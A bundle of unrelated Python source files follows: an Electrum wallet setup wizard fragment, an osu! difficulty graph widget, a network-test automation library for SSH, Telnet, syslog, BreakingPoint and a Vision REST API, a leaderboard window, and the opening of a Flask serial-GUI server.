_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.emit(QtCore.SIGNAL('synchronized'), msg)
self.connect(self, QtCore.SIGNAL('synchronized'), self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.emit(QtCore.SIGNAL('accept'))
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = map(lambda x: x[0], choices)
c_titles = map(lambda x: x[1], choices)
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(unicode(text)))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(unicode(line.text()).split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
graph_tap_difficulty.py
|
import numpy as np
import threading
import math
import pyqtgraph
from pyqtgraph.functions import mkPen
from pyqtgraph.Qt import QtGui, QtCore
from osu_analysis import StdScoreData
from app.data_recording.data import RecData
class GraphTapDifficulty(QtGui.QWidget):
__calc_data_event = QtCore.pyqtSignal(object, object, object)
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
# Main graph
self.__graph = pyqtgraph.PlotWidget(title='Tap difficulty graph')
self.__graph.getPlotItem().getAxis('left').enableAutoSIPrefix(False)
self.__graph.getPlotItem().getAxis('bottom').enableAutoSIPrefix(False)
self.__graph.enableAutoRange(axis='x', enable=False)
self.__graph.enableAutoRange(axis='y', enable=False)
self.__graph.setLimits(yMin=-1, yMax=12)
self.__graph.setRange(xRange=[-0.1, 1.1], yRange=[-1, 5])
self.__graph.setLabel('left', 'Tap factor', units='', unitPrefix='')
self.__graph.setLabel('bottom', 'Factors', units='%', unitPrefix='')
self.__graph.addLegend()
self.__diff_plot_miss = pyqtgraph.ErrorBarItem()
self.__graph.addItem(self.__diff_plot_miss)
self.__diff_plot_perf = pyqtgraph.ErrorBarItem()
self.__graph.addItem(self.__diff_plot_perf)
self.__diff_plot_bad = pyqtgraph.ErrorBarItem()
self.__graph.addItem(self.__diff_plot_bad)
# Stats
self.__graph_text = pyqtgraph.TextItem('', anchor=(0, 0), )
self.__graph.addItem(self.__graph_text)
# Put it all together
self.__layout = QtGui.QHBoxLayout(self)
self.__layout.setContentsMargins(0, 0, 0, 0)
self.__layout.setSpacing(2)
self.__layout.addWidget(self.__graph)
# Connect signals
self.__calc_data_event.connect(self.__display_data)
self.__graph.sigRangeChanged.connect(self.__on_view_range_changed)
self.__on_view_range_changed()
def plot_data(self, play_data):
if play_data.shape[0] == 0:
return
thread = threading.Thread(target=self.__plot_tap_factors, args=(play_data, ))
thread.start()
def __plot_tap_factors(self, play_data):
# Determine what was the latest play
data_filter = \
(play_data[:, RecData.TIMESTAMP] == max(play_data[:, RecData.TIMESTAMP]))
play_data = play_data[data_filter]
# Filter out sliders holds and releases
data_filter = (
(play_data[:, RecData.ACT_TYPE] != StdScoreData.ACTION_HOLD) & \
(play_data[:, RecData.ACT_TYPE] != StdScoreData.ACTION_RELEASE)
)
play_data = play_data[data_filter]
# Check if there is any data to operate on
if play_data.shape[0] < 3:
data_stub = np.asarray([])
self.__calc_data_event.emit(data_stub, data_stub, data_stub)
return
# Calculate data
toffsets = play_data[:, RecData.T_OFFSETS]
timings = play_data[:, RecData.TIMINGS]
is_miss = (play_data[:, RecData.HIT_TYPE] == StdScoreData.TYPE_MISS)
bpm_inc = play_data[:, RecData.DT_DEC]
bpm_dec = play_data[:, RecData.DT_INC]
score_mask = np.zeros((timings.shape[0] - 2, 3), dtype=np.bool)
score_mask[:, 0] = is_miss[2:]
score_mask[:, 1] = np.abs(toffsets[2:] <= 32)
score_mask[:, 2] = np.abs(toffsets[2:] > 32) & ~is_miss[2:]
rates = 1000/(timings[2:] - timings[:-2])
stamina = np.zeros(rates.shape[0])
stamina_select = (bpm_dec[2:] > bpm_inc[2:])
stamina[stamina_select] = 0.1*(np.log(bpm_inc[2:][stamina_select]/1000 + 1) + 1)
stamina[~stamina_select] = 0.1
data_x = np.linspace(0, 1, rates.shape[0])
data_y = rates*stamina*3
sort_idx = np.argsort(data_y)
data_y = data_y[sort_idx]
score_mask[:, 0] = score_mask[sort_idx, 0]
score_mask[:, 1] = score_mask[sort_idx, 1]
score_mask[:, 2] = score_mask[sort_idx, 2]
self.__calc_data_event.emit(data_x, data_y, score_mask)
def __display_data(self, data_x, data_y, score_mask):
xMin = -0.1
xMax = 1.1
data_x_miss = data_x[score_mask[:, 0]]
data_y_miss = data_y[score_mask[:, 0]]
data_x_perf = data_x[score_mask[:, 1]]
data_y_perf = data_y[score_mask[:, 1]]
data_x_bad = data_x[score_mask[:, 2]]
data_y_bad = data_y[score_mask[:, 2]]
# Set plot data
self.__diff_plot_miss.setData(x=data_x_miss, y=data_y_miss/2, top=data_y_miss/2, bottom=data_y_miss/2, pen=mkPen((200, 0, 0, 200), width=2))
self.__diff_plot_perf.setData(x=data_x_perf, y=data_y_perf/2, top=data_y_perf/2, bottom=data_y_perf/2, pen=mkPen((0, 72, 255, 150), width=2))
self.__diff_plot_bad.setData(x=data_x_bad, y=data_y_bad/2, top=data_y_bad/2, bottom=data_y_bad/2, pen=mkPen((224, 224, 0, 100), width=2))
self.__graph.setLimits(xMin=xMin, xMax=xMax)
self.__graph.setRange(xRange=[ xMin, xMax ])
play_percent = 1 - (data_y_miss.shape[0] + 0.25*data_y_bad.shape[0])/data_y.shape[0]
self.__graph_text.setText(
f"""
Peak difficulty: {data_y[-1]:.2f}
Majority difficulty: {data_y[int(data_y.shape[0]*0.95)]:.2f}
Average difficulty: {data_y.mean():.2f}
Play percentage: {play_percent:.2f}
Play diff estimate: {data_y[int(play_percent*(data_y.shape[0] - 1))]:.2f}
"""
)
def __on_view_range_changed(self, _=None):
view = self.__graph.viewRect()
pos_x = view.left()
pos_y = view.bottom()
margin_x = 0.001*(view.right() - view.left())
margin_y = 0.001*(view.top() - view.bottom())
self.__graph_text.setPos(pos_x + margin_x, pos_y + margin_y)
|
__init__.py
|
import logging
import paramiko
import requests
import asyncio
import aiohttp
import sys
import telnetlib
from io import StringIO
from os import getcwd, chdir, popen
from threading import Thread
from time import sleep
from typing import Any, Dict, List
from socketserver import BaseRequestHandler
from urllib3.exceptions import MaxRetryError
from bps_restpy.bps_restpy_v1.bpsRest import BPS
from selenium import webdriver
from selenium.common.exceptions import TimeoutException, WebDriverException, ElementNotInteractableException, \
InvalidElementStateException, NoSuchElementException, StaleElementReferenceException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
# class for context manager tools like: cd( change directory ), ping, etc..
class Tools:
# current working directory
cwd = getcwd()
# exception flag
exc = False
# context manager for changing directory
class cd:
def __init__(self, path: str):
"""
:param path: The path of the directory to change to.
"""
chdir(path)
def __enter__(self):
return self
def __exit__(self, exc_type, value, traceback):
chdir(Tools.cwd)
# context manager for turning prints into string
class to_string:
def __init__(self):
self.old_stdout = sys.stdout
sys.stdout = self.mystdout = StringIO()
def __enter__(self):
return self.mystdout
def __exit__(self, exc_type, value, traceback):
sys.stdout = self.old_stdout
# the IP that can connect to the specified destination, 8.8.8.8 is the default
@staticmethod
def get_ip_address(destination: str = "8.8.8.8") -> Any:
"""
:param destination: The destination ip to reach from the machine
:return: The ip address that can connect to the specified destination
"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((destination, 80))
return s.getsockname()[0]
# ping command, returns True/False
@staticmethod
def ping(host: str, timeout: int = 1, tries: int = 2) -> bool:
"""
:param host: can be ip or host name
:param timeout: timeout in seconds, 1 is the minimum
:param tries: number of ping re-tries
:return: True/False
"""
from platform import system
flag = False
try:
assert timeout >= 1 and tries >= 1
except AssertionError:
timeout, tries = 1, 2
print(
"timeout and tries should be more or equal to 1, revert to defaults timeout, tries = 1, 2")
command = f'ping -n 1 -w {timeout * 1000} {host}' if system().lower() == 'windows' else \
f'ping -c 1 -W {timeout} {host}'
for i in range(tries):
response = popen(command).read().lower()
if 'unreachable' not in response and "100%" not in response:
flag = True
break
if Tools.exc and (not flag):
raise Exc.NoPingError
return flag
# exceptions
class Exc:
class NoPingError(Exception):
pass
class SSHError(Exception):
pass
class TelnetError(Exception):
pass
# class that contain all the automation functions with Chrome.
class Chrome:
"""
Chrome Automation.
"""
def __init__(self, url: str = ""):
"""
:param url: The URL
"""
# Opening Chrome Driver
options = Options()
options.add_experimental_option("prefs", {
"download.default_directory": rf"{Tools.cwd}",
"download.prompt_for_download": False,
"download.directory_upgrade": True,
"safebrowsing.enabled": True
})
options.add_argument('--ignore-certificate-errors')
try:
self.driver = webdriver.Chrome(options=options)
except WebDriverException:
import chromedriver_autoinstaller
chromedriver_autoinstaller.install()
self.driver = webdriver.Chrome(options=options)
self.url(url)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def url(self, url: str):
# if the url string don't have '://' in it the next line would add 'https://'
# and if the url string is empty the default page is google.com
url = f"{('://' not in url) * 'https://'}{url}{(not url) * 'www.google.com'}"
Tools.ping(url)
try:
self.driver.get(url)
self.driver.fullscreen_window()
except WebDriverException:
print("ERR_CONNECTION_TIMED_OUT")
self.close()
def close(self):
try:
self.driver.close()
self.driver.quit()
except MaxRetryError:
pass
def wait(self, elem: str, delay: int = 10, elem_type: str = By.XPATH) -> bool:
"""
:param elem: The copied element, the element should be in the type that is selected
:param delay: The delay
:param elem_type: The default type is Xpath
:return: True if the element is existing
"""
elem = elem.strip()
flag = True
try:
WebDriverWait(self.driver, delay).until(expected_conditions.presence_of_element_located((elem_type, elem)))
except TimeoutException:
print("Wait False", elem)
flag = False
return flag
def click(self, elem: str, elem_type: str = By.XPATH, tries: int = 3, delay: int = 3) -> bool:
"""
:param elem: The copied Xpath element
:param elem_type: The default type is Xpath
:param tries: tries to click
:param delay: The delay for the wait function
:return: True if click succeeded
"""
flag = True
if self.wait(elem=elem, delay=delay):
elem = elem.strip()
for i in range(tries):
try:
self.driver.find_element(elem_type, elem).click()
break
except (ElementNotInteractableException, InvalidElementStateException, StaleElementReferenceException,
NoSuchElementException):
pass
else:
flag = False
else:
flag = False
return flag
def fill(self, elem: str, text: str, elem_type: str = By.XPATH, enter: bool = False,
tries: int = 3, delay: int = 5) -> bool:
"""
:param elem: The copied Xpath element
:param text:
:param elem_type: The default type is Xpath
:param enter:
:param tries:
:param delay:
:return:
"""
flag = True
if self.wait(elem=elem, delay=delay):
for i in range(tries):
try:
my_elem = self.driver.find_element(elem_type, elem)
my_elem.click()
my_elem.clear()
my_elem.send_keys(text)
if enter:
my_elem.send_keys(Keys.ENTER)
break
except (ElementNotInteractableException, InvalidElementStateException, StaleElementReferenceException,
NoSuchElementException):
flag = False
else:
flag = False
else:
flag = False
return flag
# class for ssh
class SSH:
def __init__(self, host: str, user: str, password: str, port: int = 22, pingf: bool = True):
"""
:param host: host to ssh
:param user: username for the ssh
:param password: password for the ssh
:param port: ssh port
:param pingf: flag to ping
"""
self.host, self.user, self.password, self.port = host, user, password, port
if Tools.ping(self.host) if pingf else True:
self.ssh_connect()
else:
print("invalid host or no ping to host")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def ssh_connect(self):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
self.ssh.connect(hostname=self.host, port=self.port, username=self.user, password=self.password)
self.channel = self.ssh.invoke_shell()
except (OSError, TimeoutError, AttributeError, paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException):
self.close()
if Tools.exc:
raise Exc.SSHError
except paramiko.ssh_exception.AuthenticationException:
self.close()
print("Username or Password is incorrect")
if Tools.exc:
raise Exc.SSHError
def command(self, command: str, command_sleep: int = 2, recv_buffer: int = 99999999, tries: int = 3) -> Any:
"""
:param command: the command
:param command_sleep: the to execute the command
:param recv_buffer: the recv command buffer
:param tries: the number of times to try to send the command
:return: returns the output of the command - not working all the time
"""
for i in range(tries):
try:
# Clearing output.
sleep(command_sleep / 6)
if self.channel.recv_ready():
self.channel.recv(recv_buffer)
self.channel.send(f'{command}\n'.encode('ascii'))
sleep(command_sleep)
if self.channel.recv_ready():
return self.channel.recv(recv_buffer).decode("utf-8", 'replace').replace("�", "").split("\n")[1:-1]
except (OSError, TimeoutError, AttributeError, paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException):
self.ssh_connect()
else:
print("ssh_command failed")
def close(self):
self.ssh.close()
# class for telnet
class Telnet:
def __init__(self, host: str, user: str, password: str, ask_user: str = "User:", ask_pass: str = "Password:",
cli_sign: str = "#", pingf: bool = True):
"""
:param host: host to telnet
:param user: username for the telnet
:param password: password for the telnet
:param ask_user: Read until a given byte string of the username statement
:param ask_pass: Read until a given byte string of the password statement
:param cli_sign: Read until a given byte string of the cli sign
:param pingf: flag to ping
"""
self.host, self.user, self.password = host, user, password
self.ask_user, self.ask_pass, self.cli_sign = ask_user, ask_pass, cli_sign
self.tn: telnetlib.Telnet
if Tools.ping(self.host) if pingf else True:
self.tel_connect()
else:
print("invalid host or no ping to host")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def tel_connect(self):
try:
self.tn = telnetlib.Telnet()
self.tn.open(self.host)
self.tn.read_until(self.ask_user.encode('ascii'))
self.tn.write(f"{self.user}\n".encode('ascii'))
self.tn.read_until(self.ask_pass.encode('ascii'))
self.tn.write(f"{self.password}\n".encode('ascii'))
self.tn.read_until(self.cli_sign.encode('ascii'), 60)
self.command(" ")
except (TimeoutError, EOFError):
self.close()
if Tools.exc:
raise Exc.TelnetError
def command(self, command: str) -> Any:
"""
:param command: the command
:return: returns the output of the command
"""
try:
self.tn.write(command.encode('ascii') + b"\n")
output = self.tn.read_until(b"#", 60)
return output.decode('utf-8', 'replace').replace("�", "").split("\n")
except AttributeError:
self.tn.write(command.encode('ascii') + b"\n")
output = self.tn.read_until(b"#", 60)
return output.decode('utf-8', 'replace').replace("�", "").split("\n")
except EOFError:
self.close()
if Tools.exc:
raise Exc.TelnetError
def close(self):
self.tn.close()
# data class for Telnet
# class for Syslog Server
class Syslog:
"""
Class for Syslog Server
"""
class SyslogUDPHandler(BaseRequestHandler):
def handle(self):
logging.info(str(bytes.decode(self.request[0].strip())))
def __init__(self, name: str = "syslog.log", ip: str = Tools.get_ip_address(), port: int = 514):
"""
:param name: Syslog log file name
:param ip: The IP address to listen to, the default ip would be the ip that can connect to 8.8.8.8
:param port: The listening port
"""
from socketserver import UDPServer
self.name, self.ip, self.port = name, ip, port
self.server = UDPServer((self.ip, self.port), Syslog.SyslogUDPHandler)
t1 = Thread(target=self.Server)
t1.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# Setting the Syslog server
def Server(self):
try:
logging.basicConfig(level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)s:\t%(message)s',
datefmt='%Y-%m-%d %H:%M:%S', filename=self.name,
filemode='a')
self.server.serve_forever(poll_interval=0.5)
except (IOError, SystemExit):
raise
except KeyboardInterrupt:
print("Crtl+C Pressed. Shutting down.")
# Closing the Server and clearing logging handler
def close(self):
# shutting down the server
self.server.shutdown()
# clearing logging handler
for handler in logging.root.handlers:
logging.root.removeHandler(handler)
# class for Breaking Point
class BP:
"""
Class for Breaking Point
"""
test_id = ""
def __init__(self, test: str, ip: str, user: str, password: str, slot: int = 0, ports: Any = None):
"""
:param test: Test name
:param ip: BP IP
:param user: BP username
:param password: BP password
:param slot: Slot number of the ports to reserve
:param ports: Ports to reserve as list, example: [1,2]
"""
self.ip, self.user, self.password = ip, user, password
self.bps = BPS(self.ip, self.user, self.password)
if slot:
self.reserve(slot, ports)
if test:
self.start(test)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
@staticmethod
def LoginDecorator(func):
def inner(self):
self.bps.login()
func(self)
self.bps.logout()
return inner
def reserve(self, slot: int, ports: List[int]):
self.bps.reservePorts(slot=slot,
portList=ports,
group=1, force=True)
@LoginDecorator
def start(self, test: str):
"""
:param test: Test name
:return: None
"""
# showing current port reservation state
with Tools.to_string() as output:
self.bps.portsState()
if self.user in output.getvalue():
self.test_id = self.bps.runTest(modelname=test, group=1)
else:
print("No Reserved Ports")
@LoginDecorator
def stop(self, csv: bool = False):
"""
:param csv: Export csv report
:return: None
"""
with Tools.to_string() as output:
self.bps.runningTestInfo()
if output.getvalue():
# stopping test
self.bps.stopTest(testid=self.test_id)
# exporting csv report of the test
if csv:
self.csv(self.test_id)
else:
print("No Running Tests")
def csv(self, test_id: Any):
self.bps.exportTestReport(test_id, "Test_Report.csv", "Test_Report")
def login(self):
self.bps.login()
def logout(self):
self.bps.logout()
# class for Vision API
class API:
"""
Login/Logout/Get/Post/Put/Delete from Vision with REST API
"""
def __init__(self, vision: str, user: str, password: str, ping_timeout: int = 1):
"""
:param vision: Vision IP
:param user: Username
:param password: Password
:param ping_timeout: ping timeout in seconds
"""
self.vision, self.user, self.password = vision, user, password
self.ping_timeout, self.flag = ping_timeout, False
if Tools.ping(vision, ping_timeout) if ping_timeout else True:
self.login()
else:
print("invalid host or no ping to host")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def login(self):
# if self.cookie:
# url = f"https://{self.vision}/mgmt/system/user/logout"
# self.response = requests.post(url, verify=False, cookies=self.cookie)
# if self.response.status_code != 200:
# self.flag = False
if not self.flag:
url = f"https://{self.vision}/mgmt/system/user/login"
fill_json = {"username": self.user, "password": self.password}
self.response = requests.post(url, verify=False, data=None, json=fill_json)
self.cookie = self.response.cookies
self.flag = False if "jsessionid" not in self.response.text else True
def url(self, url: str) -> str:
if "://" not in url:
if "/mgmt" in url:
url = f"https://{self.vision}{url}"
else:
url = f"https://{self.vision}/mgmt/device/df{url}"
return url
def get(self, url: str) -> Any:
url = self.url(url)
self.response = requests.get(url, verify=False, data=None, cookies=self.cookie)
return self.response.json()
def post(self, url: str, json: Dict[str, Any]) -> Any:
url = self.url(url)
self.response = requests.post(url, verify=False, data=None, json=json, cookies=self.cookie)
return self.response.json()
def put(self, url: str, json: Dict[str, Any]) -> Any:
url = self.url(url)
self.response = requests.put(url, verify=False, data=None, json=json, cookies=self.cookie)
return self.response.json()
def delete(self, url: str) -> Any:
url = self.url(url)
self.response = requests.delete(url, verify=False, data=None, cookies=self.cookie)
return self.response.json()
def a_get(self, urls):
results = []
headers = {'Cookie': "; ".join([f"{x}={y}" for x, y in self.cookie.items()])}
def get_tasks(session):
tasks = []
for url in urls:
url = self.url(url)
tasks.append(asyncio.create_task(session.get(url, headers=headers, ssl=False)))
return tasks
async def get_responses():
async with aiohttp.ClientSession() as session:
tasks = get_tasks(session)
responses = await asyncio.gather(*tasks)
for response in responses:
results.append(await response.json())
asyncio.run(get_responses())
return results
def close(self):
url = f"https://{self.vision}/mgmt/system/user/logout"
self.response = requests.post(url, verify=False, cookies=self.cookie)
|
display.py
|
# -*- coding: utf-8 -*-
import PySimpleGUI as sg
import threading
import time
W = 30 # name width
last_correct = 'baniverse'
def open_leaderboard():
while True:
event, value = leaderboard.read()
if event == sg.WIN_CLOSED:
break
leaderboard.close()
def update_leaderboard(players, last):
global last_correct
i = 1
for (k,v) in sorted(players.items(), key=lambda x: -x[1]):
entry = f"{i}. {k.ljust(W-10)} {str(v).rjust(3)}"
leaderboard[i].update(entry)
i+=1
if i > 5:
break
if last:
last_correct = last
leaderboard[0].update(f"{last_correct} ({players[last_correct] if last_correct != 'beginnergo' else '-∞'})".ljust(W))
leaderboard.refresh()
def update_move(coords):
leaderboard['m'].update(coords.ljust(10))
leaderboard.refresh()
sg.theme('DarkPurple') # Add a touch of color
small = {'font': 'Courier 16', 'text_color': 'white'}
medium = {'font': 'Sans-Serif 20', 'text_color': 'white'}
big = {'font': 'Sans-Serif 80', 'text_color': 'white'}
layout = [
[sg.Text(''.ljust(W+10), key=1, **small)],
[sg.Text(''.ljust(W+10), key=2, **small)],
[sg.Text(''.ljust(W+10), key=3, **small)],
[sg.Text(''.ljust(W+10), key=4, **small)],
[sg.Text(''.ljust(W+10), key=5, **small)],
[sg.Text(' ', **small)],
[sg.Text('Last correct answer:', **medium)],
[sg.Text(''.ljust(W+10), key=0, **medium)],
[sg.Text(' ', **small)],
[sg.Text('Last move:', **medium)],
[sg.Text(''.ljust(10), key='m', **big)], ]
leaderboard = sg.Window('Top Players', layout, alpha_channel=0.7)
t = threading.Thread(target=open_leaderboard)
t.start()
time.sleep(1)
|
primary.py
|
#!/usr/bin/env python
#Copyright (c) 2015,2016 Joseph D. Steinmeyer (jodalyst), Jacob White, Nick Arango
#Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
#Version 0 of j
#questions? email me at jodalyst@mit.edu
# Based off of Python Flask FAQ field (Miguel is awesome)
# Set this variable to "threading", "eventlet" or "gevent" to test the
# different async modes, or leave it set to None for the application to choose
# the best option based on available packages.
#async_mode = 'threading'
#async_mode = 'eventlet'
async_mode = None
if async_mode is None:
try:
import eventlet
async_mode = 'eventlet'
except ImportError:
pass
if async_mode is None:
try:
from gevent import monkey
async_mode = 'gevent'
except ImportError:
pass
if async_mode is None:
async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
import eventlet
eventlet.monkey_patch()
elif async_mode == 'gevent':
from gevent import monkey
monkey.patch_all()
import time
from threading import Thread, Lock
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
import sys
import glob
import serial
import json
import struct
import csv
#Version 2.7 or Above?
if sys.version_info[0] >2:
version3 = True
kwargs = {'newline':''}
else:
version3 = False
kwargs = {}
##import logging
##log = logging.getLogger('werkzeug')
##log.setLevel(logging.ERROR)
serialConnected = False #global flag for whether or not the serial port should be connected
serialPort =0 # (init value is 3...junk) contains serial port object when in use...touching protected by serialLock below
serialLock = Lock() #serial permission lock (protects shared resource of serial port)
print (serialLock)
#Taken from here on StackExchange: http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
#Want to give credit where credit is due!
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in list(range(256))]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
#print("checking port "+port)
s = serial.Serial(port)
#print("closing port "+port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
#-------------------
#serial variables:
serialselection = ''
baudselection = 115200
mcuMessage = []
'''system_parameters (dictionary where keys are user-variable parameters and entry is list consisting of current value (index 0 and single-character comm term for conveying value back to micro...for example you could have system_parameters['K_d']=[1.4,'D']
'''
system_parameters = {}
#params_and_values an ordered list of the names of paramters, headroom, and values to be plotted
#Used in generating CSV header list in order
params_and_values = []
#A list pointing to parameter values for quick plotting (rather than list comprehend this every time
param_vals = []
command_terms = ['HIHI']
#expected_length...how long each full message from Micro should be
expected_length = 0
#function that will be stored for chopping up message into appropriate signed/unsignedness/float, etc... makes this processing arbitrarily expandable as needed...must obviously agree with encoding scheme on micro
parseFunction = lambda x: [0]
'''Kp = 0.0
Kd = 0.0
Ki = 0.0
direct = 0.0
desired = 0.0
alternate = 0.0 # global flag of whether or not we're alternating...
'''
#ALTERNATING DATA STRUCTURE:
# timer and state are used for storing/remembering the switching action
# period is how often to switch (in seconds)
# param is the user input that is switched (determined during initialization)
alt_data = {'timer': time.time(), 'state':-1.0, 'period': 5, 'param': None} #data struture used to implement alternating behavior
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode = async_mode)
thread = None
#csv variables:
global csv_default
global csv_recent
global current
global archive
csv_st = time.time()
#variable which determines whether a csv is being generated or not.
csv_yn = False #start out not writing csv files
csvLock = Lock()
keepRunning = True #set to True for default
#global setup variables:
#used during initialization of comms/building GUI
isSetup = False
setupString = ""
allGoodFromGUI = False
